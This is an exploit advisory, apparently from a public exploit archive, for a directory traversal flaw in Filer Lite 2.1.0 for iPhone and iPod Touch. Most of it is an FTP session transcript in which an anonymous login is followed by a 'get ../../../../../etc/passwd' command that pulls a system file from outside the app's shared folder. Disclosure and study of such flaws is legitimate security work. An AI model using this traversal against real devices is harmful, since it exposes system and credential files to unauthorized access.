Filer Lite version 2.1.0 for iPhone / iPod Touch suffers from a directory traversal vulnerability.
417181ee090d1136ece6f7d559f43621f79a2b21d74ece66f574607edf73d160
# Exploit Title: Filer Lite v2.1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/filer-lite-download-view-manage/id350939597?mt=8
# Version: 2.1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is directory traversal vulnerability in the Filer Lite.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 1
drwxr-xr-x 2 mobile mobile 136 Feb 24 15:42 Filer Help Files
226 Transfer complete.
ftp: 81 bytes received in 0.00Seconds 81000.00Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.